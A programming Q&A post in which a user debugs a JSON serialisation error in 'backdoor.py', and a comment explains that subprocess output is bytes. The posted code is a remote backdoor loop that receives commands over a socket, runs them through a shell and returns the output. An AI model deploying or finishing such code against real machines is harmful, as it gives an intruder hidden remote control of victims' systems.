# raise TypeError(f'Object of type {o.__class__.__name__} ' TypeError: Object of type bytes is not JSON serializable

Tags: python, json, sockets, python-sockets

i am having trouble with this code i dont know where the error is the client or the server this is the code

```
    def execute_command(self, command):
        que = subprocess.check_output(command, shell=True)
        return que

    def reliable_send(self, data):
        self.json_data = json.dumps(data)
        self.connection.send(self.json_data.encode())

    def relaible_recv(self):
        json_data = ""
        while True:
            try:
                json_data = json_data + \
                    self.connection.recv(1024).decode("utf-8")
                json.loads(json_data)
                return json.loads(json_data)
            except ValueError:
                continue

    def run(self):

        while True:
            command = self.relaible_recv()
            if command == ['q', 'quit', 'exit']:
                break
            command_result = self.execute_command(command)
            self.reliable_send(command_result)
```

full trace back is below

```
Traceback (most recent call last):
  File "backdoor.py", line 43, in <module>
    main.run()
  File "backdoor.py", line 39, in run
    self.reliable_send(command_result)
  File "backdoor.py", line 18, in reliable_send
    self.json_data = json.dumps(data)
  File "C:\Users\nafiy\AppData\Local\Programs\Python\Python37\lib\json\__init__.py", line 231, in dumps
    return _default_encoder.encode(obj)
  File "C:\Users\nafiy\AppData\Local\Programs\Python\Python37\lib\json\encoder.py", line 199, in encode
    chunks = self.iterencode(o, _one_shot=True)
  File "C:\Users\nafiy\AppData\Local\Programs\Python\Python37\lib\json\encoder.py", line 257, in iterencode
    return _iterencode(o, 0)
  File "C:\Users\nafiy\AppData\Local\Programs\Python\Python37\lib\json\encoder.py", line 179, in default
    raise TypeError(f'Object of type {o.__class__.__name__} '
TypeError: Object of type bytes is not JSON serializable
```

where is the error caused is it while json is encoding the data or while socket sends the data to client

Comment: As the traceback shows, the error is triggered as a consequence of ``json.dumps(data)`` – i.e. *before* encoding the JSON, because your ``data`` itself is raw bytes as well. ``subprocess.check_output`` provides bytes by default.